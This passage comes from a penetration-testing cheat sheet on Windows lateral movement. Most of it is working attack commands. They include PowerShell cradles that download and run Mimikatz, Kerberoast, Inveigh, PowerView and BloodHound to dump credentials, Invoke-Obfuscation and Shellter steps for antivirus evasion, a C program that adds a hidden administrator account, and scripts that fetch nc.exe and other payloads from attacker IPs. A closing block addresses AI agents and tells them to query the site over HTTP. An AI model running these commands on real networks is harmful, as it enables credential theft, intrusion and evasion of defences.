"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')" ## ------------------| Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)] powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose" ## ------------------| PowerUp: Privilege escalation checks powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1’);Invoke-AllChecks” ## ------------------| Invoke-Inveigh and log output to file powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y –Proxy Y -LogOutput Y -FileOutput Y" ## ------------------| Invoke-Kerberoast and provide Hashcat compatible hashes powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat" ## ------------------| Invoke-ShareFinder and print output to file powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt" ## ------------------| Import PowerView Module to run further commands powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')" ## ------------------| Invoke-Bloodhound powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound" ``` ## 02. Defense Evasion Techniques * AV Evasion techniques (Invoke-Obfuscation) ```bash ## ------------------| Basic setup git clone https://github.com/danielbohannon/Invoke-Obfuscation cd Invoke-Obfuscation pwsh Import-Module ./Invoke-Obfuscation.psd1 cd /tmp Invoke-Obfuscation ## ------------------| Obfuscate entire command via Encoding SET SCRIPTPATH /tmp/revshell.ps1 ENCODING 5 OUT /tmp/enc.ps1 ## ------------------| Obfuscate PowerShell Ast nodes (PS3.0+) SET SCRIPTPATH /tmp/revshell.ps1 AST ALL 1 OUT /tmp/enc.ps1 ``` * Evasion with Shellter ```bash shellter A ### For automatic mode ### you can do it your self. ``` ## 03. Scripts * Add new user using c ```bash #include int main () { int user; user = system ("net user h4rithd Password! /add"); user = system ("net localgroup administrators h4rithd /add"); return 0; } ## sudo i686-w64-mingw32-gcc adduser.c -o adduser.exe ``` * Get-ServiceACL.ps1 ```bash # download Get-ServiceACL.ps1 to the box and execute in memory $h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://10.10.14.2/GetServiceACL.ps1',$false);$h.send();iex $h.responseText # examine nscp service ACL "nscp" | Get-ServiceAcl | select -ExpandProperty Access ``` * Invoke-TSPingSweep.ps1 ```bash wget https://raw.githubusercontent.com/dwj7738/My-Powershell-Repository/master/Scripts/Invoke-TSPingSweep.ps1 IEX(New-Object Net.WebClient).downloadString('http://10.8.0.74/Invoke-TSPingSweep.ps1') Invoke-TSPingSweep -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost -ScanPort ``` * [Invoke-Portscan.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/Invoke-Portscan.ps1) ```bash ## ------------------| Scan port 22 Invoke-Portscan -Hosts 172.16.249.1/24 -Ports 22 -Threads 30 | Where { $_.Alive -eq "True" } ## ------------------| Scan other ports Invoke-Portscan -Hosts 172.16.249.202 -Ports '21,22,80,443,8080' ``` * [Invoke-AESEncryption.ps1](https://www.powershellgallery.com/packages/DRTools/4.0.2.3/Content/Functions/Invoke-AESEncryption.ps1) ```bash ## ------------------| Import-Module Import-Module .\Invoke-AESEncryption.ps1 ## ------------------| Encrypt Invoke-AESEncryption.ps1 -Mode Encrypt -Key "h4rithd" -Path .\PlanText.txt ## ------------------| Decrypt Invoke-AESEncryption -Mode Decrypt -Key "h4rithd" -Path .\ciphertext.txt.aes ``` * [wget](https://superuser.com/questions/25538/how-to-download-files-from-command-line-in-windows-like-wget-or-curl/373068) script for download file. ```bash ## ------------------| Create wget.js file var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false); WinHttpReq.Send(); BinStream = new ActiveXObject("ADODB.Stream"); BinStream.Type = 1; BinStream.Open(); BinStream.Write(WinHttpReq.ResponseBody); BinStream.SaveToFile(WScript.Arguments(1)); ## ------------------| It can be executed as follows. cscript /nologo wget.js http://10.10.14.25/nc.exe nc.exe ## ------------------| Create wget.vbs file dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") dim bStrm: Set bStrm = createobject("Adodb.Stream") xHttp.Open "GET", WScript.Arguments.Item(0), False xHttp.Send with bStrm .type = 1 .open .write xHttp.responseBody .savetofile WScript.Arguments.Item(1), 2 end with ## ------------------| It can be executed as follows. cscript /nologo wget.vbs http://10.10.14.25/nc.exe nc.exe ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://p0db0t.gitbook.io/pentest/windows/lateral-movement.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.